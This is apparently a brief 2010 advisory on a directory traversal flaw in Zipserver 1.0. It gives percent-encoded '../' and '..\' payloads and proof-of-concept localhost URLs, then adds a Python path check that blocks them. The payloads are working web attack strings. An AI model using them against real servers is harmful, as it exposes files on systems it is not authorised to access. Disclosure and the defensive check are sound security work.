It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially crafted URL.
Exploit:
..%2F/
..%5C/
PoC:
http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/
http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/
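The server-side check that stops both encoded forms above, shown as an added example (not Zipserver's code and not from the original post): decode the URL path once, treat `\` as a separator as well as `/`, refuse any `..` segment, then confirm the resolved path is still inside the document root. `DOC_ROOT`, `resolve_request_path` and the sample requests are assumptions made for illustration.

```python
from pathlib import Path
from urllib.parse import unquote

# Assumed document root for the example; the advisory does not name one.
DOC_ROOT = Path("/srv/zipserver/www")


def resolve_request_path(raw_path, root=DOC_ROOT):
    """Map a raw URL path to a file under root, or return None to reject it."""
    # Decode percent-escapes before any check, so %2F and %5C are seen
    # as the separators they become once the path reaches the file system.
    decoded = unquote(raw_path.split("?", 1)[0])
    if "\x00" in decoded:
        return None
    # Backslash is a path separator on Windows, so split on both forms.
    parts = [p for p in decoded.replace("\\", "/").split("/") if p not in ("", ".")]
    if ".." in parts:
        return None
    root_resolved = root.resolve()
    candidate = root_resolved.joinpath(*parts).resolve()
    # Defence in depth: after symlink resolution the target must still
    # be the root itself or a descendant of it.
    if candidate != root_resolved and root_resolved not in candidate.parents:
        return None
    return candidate


# Constructed sample requests: the two PoC paths from the post plus benign ones.
SAMPLE_REQUESTS = [
    "/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/",
    "/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/",
    "/docs/readme.txt",
    "/",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        result = resolve_request_path(request)
        print(f"{request!r:50} -> {'REJECTED' if result is None else result}")
```

The path is decoded exactly once here; any later layer that decodes it again would reopen the problem for double-encoded input such as `%252F`.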
Saturday, May 15, 2010